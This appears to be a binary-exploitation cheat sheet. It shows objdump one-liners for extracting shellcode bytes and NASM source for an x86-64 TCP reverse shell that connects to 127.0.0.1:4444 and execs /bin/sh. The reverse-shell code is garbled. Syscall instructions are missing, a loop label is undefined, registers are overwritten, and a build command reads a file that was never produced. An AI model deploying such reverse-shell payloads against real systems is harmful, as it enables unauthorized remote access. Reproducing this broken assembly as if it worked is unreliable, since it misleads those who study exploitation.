Shellcodes for Binary Exploitation

Extract the shellcode bytes from the compiled binary using objdump

# Turn objdump's instruction lines into one quoted, \x-escaped byte string:
#   keep only lines with an "addr:" prefix, take the text after the colon,
#   keep the first six space-separated fields (the hex byte column), squeeze
#   whitespace, prefix every byte with \x, join all lines, and wrap in quotes.
# NOTE(review): cut -f1-6 keeps at most six byte fields per line, while
# objdump can print seven bytes on a line for long instructions — confirm no
# bytes are dropped on inputs larger than the sample below.
objdump -d ./Exit.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Output: "\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05"

# Loop form of the same extraction: column 2 (tab-separated) of each
# instruction line holds the hex bytes; word splitting yields one byte per
# iteration, each printed with a \x prefix, then a final newline.
# NOTE(review): relies on echo not interpreting the "\x" escape — behaviour
# differs between shells/echo implementations; confirm for the shell in use.
for i in $(objdump -d Exit.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo


X86/64-bit TCP Reverse Shell 

#Compile and get Shellcode
# Assemble the NASM source into an ELF64 object file.
nasm -f elf64 stack.nasm -o stack.o
# Disassemble every section (-D) in Intel syntax to inspect the emitted bytes.
objdump -M intel -D stack.o
# Link the object into a standalone executable.
ld stack.o -o stack
# NOTE(review): this reads ./rev, but the commands above produce ./stack —
# confirm the intended file. Also, -D covers all sections, so bytes outside
# .text may be picked up by the "^ " filter; -d on the object limits this.
for i in $(objdump -D ./rev |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo

Shell starts here

section .text
global _start


; clearing rax, rdi, rsi, rdx
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

add rax, 41 ;syscall number for socket
add rdi, 2
add rsi, 1

mov rdi, rax

; preparing structure for connect
; IP - - 0x0101017F; 1 - 01, 127 -7F
push 0x0100007f
; Port 9999 - 270F - 0x0f27
; Port 4444 - 115c - 0x5c11
push word 0x5c11
push word 0x2

mov rsi, rsp
add rdx, 0x10
xor rax, rax
add rax, 42

xor rsi, rsi
add rsi, 2
		xor rax, rax
		add rax, 33
		dec rsi
		jns loop

xor rax, rax
mov rdx, rax    ; NULL for argument 3
mov rsi, rdx     ;NULL for argument 2

push rax
mov rbx, 0x68732f6e69622f2f
push rbx
mov rdi, rsp

add rax, 59